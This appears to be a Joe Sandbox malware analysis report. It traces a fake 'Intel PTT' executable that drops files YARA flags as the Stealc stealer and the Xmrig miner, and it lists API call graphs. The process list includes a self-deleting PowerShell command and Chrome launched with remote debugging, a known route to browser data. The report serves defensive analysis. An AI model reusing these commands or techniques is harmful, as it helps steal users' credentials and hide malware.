Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:0x7ff6e1c00000
File size:1'827'328 bytes
MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:21:15:01
Start date:20/12/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:explorer.exe
Imagebase:0x7ff72b770000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2996017964.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2933758160.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:52
Start time:21:15:02
Start date:20/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:21:15:03
Start date:20/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:21:15:06
Start date:20/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:55
Start time:21:15:06
Start date:20/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                              Start time:21:15:08
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe"
                                                                                                                                                                                                                              Imagebase:0x1e0000
                                                                                                                                                                                                                              File size:2'862'592 bytes
                                                                                                                                                                                                                              MD5 hash:6149ACB6D658FE29407A8AB94D3A0784
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                              Start time:21:15:11
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
                                                                                                                                                                                                                              Imagebase:0xbe0000
                                                                                                                                                                                                                              File size:1'831'936 bytes
                                                                                                                                                                                                                              MD5 hash:C20D4E11E1046A5665D427BB4F6DE39E
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                              Start time:21:15:16
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe"
                                                                                                                                                                                                                              Imagebase:0xde0000
                                                                                                                                                                                                                              File size:968'704 bytes
                                                                                                                                                                                                                              MD5 hash:FB1BFBB2B0FA71F93BEFD137BECD031B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                              Start time:21:15:20
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true


Execution Graph

Execution Coverage:4.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:4%
Total number of Nodes:770
Total number of Limit Nodes:16
13276 53132 GetCurrentThreadId 13274->13276 13276->13272 13277 5313b 13276->13277 13277->13272 13278 6c6ac GetSystemTimePreciseAsFileTime 13277->13278 13280 5315f 13278->13280 13279->13272 13279->13273 13280->13266 13280->13270 13280->13279 13281 6bd4c GetSystemTimePreciseAsFileTime 13280->13281 13281->13280 12769 6d111 12771 6d122 12769->12771 12772 6d12a 12771->12772 12773 6d199 12771->12773 12774 6d1a7 SleepConditionVariableCS 12773->12774 12776 6d1c0 12773->12776 12774->12776 12776->12771 12929 59adc 12930 59aea 12929->12930 12934 59afe shared_ptr 12929->12934 12931 5a917 12930->12931 12930->12934 12932 5a953 Sleep CreateMutexA 12931->12932 12933 5a98e 12932->12933 12935 55c10 6 API calls 12934->12935 12936 59b7c 12935->12936 12937 58b30 6 API calls 12936->12937 12938 59b8d 12937->12938 12939 55c10 6 API calls 12938->12939 12940 59cb1 12939->12940 12941 58b30 6 API calls 12940->12941 12942 59cc2 12941->12942 13093 53f9f 13094 53fb6 13093->13094 13095 53fad 13093->13095 13096 52410 5 API calls 13095->13096 13096->13094 12829 5215a 12832 6c6fc 12829->12832 12831 52164 12834 6c70c 12832->12834 12835 6c724 12832->12835 12834->12835 12836 6cfbe 12834->12836 12835->12831 12837 6ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12836->12837 12838 6cfd0 12837->12838 12838->12834 13097 59ba5 13098 59ba7 13097->13098 13099 55c10 6 API calls 13098->13099 13100 59cb1 13099->13100 13101 58b30 6 API calls 13100->13101 13102 59cc2 13101->13102 12301 86629 12304 864c7 12301->12304 12305 864d5 __fassign 12304->12305 12306 86520 12305->12306 12309 8652b 12305->12309 12308 8652a 12315 8a302 GetPEB 12309->12315 12311 86535 12312 8653a GetPEB 12311->12312 12314 8654a __fassign 12311->12314 12312->12314 12313 86562 ExitProcess 12314->12313 12316 8a31c __fassign 12315->12316 12316->12311 12512 5b1a0 12513 5b1f2 12512->12513 12514 5b3ad CoInitialize 12513->12514 12515 5b3fa shared_ptr __floor_pentium4 12514->12515 12728 520a0 12731 6c68b 12728->12731 12730 520ac 12734 6c3d5 
12731->12734 12733 6c69b 12733->12730 12735 6c3e1 12734->12735 12736 6c3eb 12734->12736 12737 6c39e 12735->12737 12738 6c3be 12735->12738 12736->12733 12737->12736 12743 6ccd5 12737->12743 12747 6cd0a 12738->12747 12740 6c3d0 12740->12733 12744 6cce3 InitializeCriticalSectionEx 12743->12744 12745 6c3b7 12743->12745 12744->12745 12745->12733 12748 6cd1f RtlInitializeConditionVariable 12747->12748 12748->12740 12777 54120 12778 5416a 12777->12778 12780 541b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 12778->12780 12781 53ee0 12778->12781 12782 53f48 12781->12782 12786 53f1e 12781->12786 12785 53f58 12782->12785 12787 52c00 12782->12787 12785->12780 12786->12780 12788 52c0e 12787->12788 12794 6b847 12788->12794 12790 52c42 12791 52c49 12790->12791 12800 52c80 12790->12800 12791->12780 12793 52c58 Concurrency::cancel_current_task 12795 6b854 12794->12795 12799 6b873 Concurrency::details::_Reschedule_chore 12794->12799 12803 6cb77 12795->12803 12797 6b864 12797->12799 12805 6b81e 12797->12805 12799->12790 12811 6b7fb 12800->12811 12802 52cb2 shared_ptr 12802->12793 12804 6cb92 CreateThreadpoolWork 12803->12804 12804->12797 12806 6b827 Concurrency::details::_Reschedule_chore 12805->12806 12809 6cdcc 12806->12809 12808 6b841 12808->12799 12810 6cde1 TpPostWork 12809->12810 12810->12808 12812 6b807 12811->12812 12813 6b817 12811->12813 12812->12813 12815 6ca78 12812->12815 12813->12802 12816 6ca8d TpReleaseWork 12815->12816 12816->12813 12948 5af20 12949 5af63 12948->12949 12960 86660 12949->12960 12954 8663f 4 API calls 12955 5af80 12954->12955 12956 8663f 4 API calls 12955->12956 12957 5af98 __cftof 12956->12957 12966 555f0 12957->12966 12959 5b04e shared_ptr __floor_pentium4 12961 8a671 __fassign 4 API calls 12960->12961 12962 5af69 12961->12962 12963 8663f 12962->12963 12964 8a671 __fassign 4 API calls 12963->12964 12965 5af71 12964->12965 12965->12954 12967 55610 12966->12967 12967->12967 12969 55710 __floor_pentium4 12967->12969 12970 
522c0 12967->12970 12969->12959 12973 52280 12970->12973 12974 52296 12973->12974 12977 887f8 12974->12977 12980 87609 12977->12980 12979 522a4 12979->12967 12981 87649 12980->12981 12985 87631 __cftof __floor_pentium4 12980->12985 12982 8690a __fassign 4 API calls 12981->12982 12981->12985 12983 87661 12982->12983 12986 87bc4 12983->12986 12985->12979 12987 87bd5 12986->12987 12988 87be4 __cftof 12987->12988 12993 88168 12987->12993 12998 87dc2 12987->12998 13003 87de8 12987->13003 13013 87f36 12987->13013 12988->12985 12994 88178 12993->12994 12995 88171 12993->12995 12994->12987 13022 87b50 12995->13022 12997 88177 12997->12987 12999 87dcb 12998->12999 13000 87dd2 12998->13000 13001 87b50 4 API calls 12999->13001 13000->12987 13002 87dd1 13001->13002 13002->12987 13004 87e09 __cftof 13003->13004 13008 87def 13003->13008 13004->12987 13005 87f69 13007 87f8b 13005->13007 13012 87f77 13005->13012 13030 88241 13005->13030 13006 87fa2 13006->13007 13026 88390 13006->13026 13007->12987 13008->13004 13008->13005 13008->13006 13008->13012 13012->13007 13034 886ea 13012->13034 13015 87f4f 13013->13015 13017 87f69 13013->13017 13014 87fa2 13018 88390 4 API calls 13014->13018 13021 87f8b 13014->13021 13015->13014 13015->13017 13020 87f77 13015->13020 13016 88241 4 API calls 13016->13020 13017->13016 13017->13020 13017->13021 13018->13020 13019 886ea 4 API calls 13019->13021 13020->13019 13020->13021 13021->12987 13023 87b62 13022->13023 13024 88ab6 4 API calls 13023->13024 13025 87b85 13024->13025 13025->12997 13028 883ab 13026->13028 13027 883dd 13027->13012 13028->13027 13038 8c88e 13028->13038 13031 8825a 13030->13031 13045 8d3c8 13031->13045 13033 8830d 13033->13012 13035 8875d __floor_pentium4 13034->13035 13037 88707 13034->13037 13035->13007 13036 8c88e __cftof 4 API calls 13036->13037 13037->13035 13037->13036 13041 8c733 13038->13041 13040 8c8a6 13040->13027 13042 8c743 13041->13042 13043 8690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 13042->13043 13044 
8c748 __cftof 13042->13044 13043->13044 13044->13040 13048 8d3ee 13045->13048 13052 8d3d8 __cftof 13045->13052 13046 8d485 13050 8d4ae 13046->13050 13051 8d4e4 13046->13051 13047 8d48a 13058 8cbdf 13047->13058 13048->13046 13048->13047 13048->13052 13053 8d4cc 13050->13053 13054 8d4b3 13050->13054 13075 8cef8 13051->13075 13052->13033 13071 8d0e2 13053->13071 13064 8d23e 13054->13064 13059 8cbf1 13058->13059 13060 8690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 13059->13060 13061 8cc05 13060->13061 13062 8cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13061->13062 13063 8cc0d __alldvrm __cftof _strrchr 13061->13063 13062->13063 13063->13052 13066 8d26c 13064->13066 13065 8d2de 13067 8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13065->13067 13066->13065 13068 8d2b7 13066->13068 13069 8d2a5 13066->13069 13067->13069 13070 8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13068->13070 13069->13052 13070->13069 13072 8d10f 13071->13072 13073 8d14e 13072->13073 13074 8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13072->13074 13073->13052 13074->13073 13076 8cf10 13075->13076 13077 8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13076->13077 13078 8cf75 13076->13078 13077->13078 13078->13052 13282 53fe0 13283 54022 13282->13283 13284 540d2 13283->13284 13285 5408c 13283->13285 13288 54035 __floor_pentium4 13283->13288 13286 53ee0 3 API calls 13284->13286 13289 535e0 13285->13289 13286->13288 13290 53616 13289->13290 13291 52ce0 5 API calls 13290->13291 13294 5364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13290->13294 13292 5369e 13291->13292 13293 52c00 3 API calls 13292->13293 13292->13294 13293->13294 13294->13288 12851 5a9f4 12862 59230 12851->12862 12853 5aa03 shared_ptr 12854 55c10 6 API calls 12853->12854 12861 5aab3 shared_ptr 12853->12861 12855 5aa65 12854->12855 12856 55c10 6 API calls 12855->12856 12857 5aa8d 12856->12857 12858 55c10 6 API calls 12857->12858 12858->12861 12859 5ad3c shared_ptr __floor_pentium4 12861->12859 12872 
88ab6 12861->12872 12865 59284 shared_ptr 12862->12865 12863 55c10 6 API calls 12863->12865 12864 59543 shared_ptr __floor_pentium4 12864->12853 12865->12863 12870 5944f shared_ptr 12865->12870 12866 55c10 6 API calls 12866->12870 12867 598b5 shared_ptr __floor_pentium4 12867->12853 12868 5979f shared_ptr 12868->12867 12869 55c10 6 API calls 12868->12869 12871 59927 shared_ptr __floor_pentium4 12869->12871 12870->12864 12870->12866 12870->12868 12871->12853 12873 88ad1 12872->12873 12874 88868 4 API calls 12873->12874 12875 88adb 12874->12875 12875->12861 12888 54276 12889 52410 5 API calls 12888->12889 12890 5427f 12889->12890 12820 58d30 12821 58d7f 12820->12821 12822 55c10 6 API calls 12821->12822 12823 58d9a shared_ptr __floor_pentium4 12822->12823 12839 52170 12840 6c6fc InitializeCriticalSectionEx 12839->12840 12841 5217a 12840->12841 12896 542b0 12899 53ac0 12896->12899 12898 542bb shared_ptr 12900 53af9 12899->12900 12901 532d0 6 API calls 12900->12901 12903 53c38 12900->12903 12904 53b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12900->12904 12901->12903 12902 532d0 6 API calls 12906 53c5f 12902->12906 12903->12902 12903->12906 12904->12898 12905 53c68 12905->12898 12906->12905 12907 53810 4 API calls 12906->12907 12908 53cdb 12907->12908 13103 577b0 13104 577f1 shared_ptr 13103->13104 13105 55c10 6 API calls 13104->13105 13107 57883 shared_ptr 13104->13107 13105->13107 13106 55c10 6 API calls 13109 579e3 13106->13109 13107->13106 13108 57953 shared_ptr __floor_pentium4 13107->13108 13110 55c10 6 API calls 13109->13110 13111 57a15 shared_ptr 13110->13111 13112 57aa5 shared_ptr __floor_pentium4 13111->13112 13113 55c10 6 API calls 13111->13113 13114 57b7d 13113->13114 13115 55c10 6 API calls 13114->13115 13116 57ba0 13115->13116 13117 55c10 6 API calls 13116->13117 13117->13112 13118 587b0 13119 587b6 13118->13119 13120 587b8 GetFileAttributesA 13118->13120 13119->13120 13121 587c4 13120->13121 13122 647b0 13124 64eed 13122->13124 13123 64f59 
shared_ptr __floor_pentium4 13124->13123 13125 57d30 7 API calls 13124->13125 13126 650ed 13125->13126 13161 58380 13126->13161 13128 65106 13129 55c10 6 API calls 13128->13129 13130 65155 13129->13130 13131 55c10 6 API calls 13130->13131 13132 65171 13131->13132 13167 59a00 13132->13167 13162 583e5 __cftof 13161->13162 13163 58403 shared_ptr __floor_pentium4 13162->13163 13164 55c10 6 API calls 13162->13164 13163->13128 13165 58427 13164->13165 13166 55c10 6 API calls 13165->13166 13166->13163 13168 59a3f 13167->13168 13169 55c10 6 API calls 13168->13169 13170 59a47 13169->13170 13171 58b30 6 API calls 13170->13171 13172 59a58 13171->13172 12571 587b2 12572 587b6 12571->12572 12573 587b8 GetFileAttributesA 12571->12573 12572->12573 12574 587c4 12573->12574 12913 59ab8 12915 59acc 12913->12915 12916 59b08 12915->12916 12917 55c10 6 API calls 12916->12917 12918 59b7c 12917->12918 12925 58b30 12918->12925 12920 59b8d 12921 55c10 6 API calls 12920->12921 12922 59cb1 12921->12922 12923 58b30 6 API calls 12922->12923 12924 59cc2 12923->12924 12926 58b7c 12925->12926 12927 55c10 6 API calls 12926->12927 12928 58b97 shared_ptr __floor_pentium4 12927->12928 12928->12920
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,0008652A,?,?,?,?,?,00087661), ref: 00086567
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: ec1b298f6ec9607fdbc4e269192f8e02c5accad0a20e85d1c9fd6c63da4cf232
• Instruction ID: edeeef6e4d2235633c462bb3d71f0a706978009bdcdcbf0edf3ab40705a658e1
• Opcode Fuzzy Hash: ec1b298f6ec9607fdbc4e269192f8e02c5accad0a20e85d1c9fd6c63da4cf232
• Instruction Fuzzy Hash: 45E08C30051908AFDF65BB1CC90DD897BA9FB52B56F010C00F85A86226CB26EE81C781
Memory Dump Source
• Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_48a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d441e979657372bedab641fbd16624962268626e1c06e9af2029fbbef54c65a4
• Instruction ID: 7ace12394a63d42e578a2845952a5e5baa8a4d447d1b1ceb41492047828356e2
• Opcode Fuzzy Hash: d441e979657372bedab641fbd16624962268626e1c06e9af2029fbbef54c65a4
• Instruction Fuzzy Hash: 310192E7748118BE71438D9527546BA6A6EF6DB3383308F26B407D5A42F6C83A787131

Control-flow Graph (image not reproduced)

Strings
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
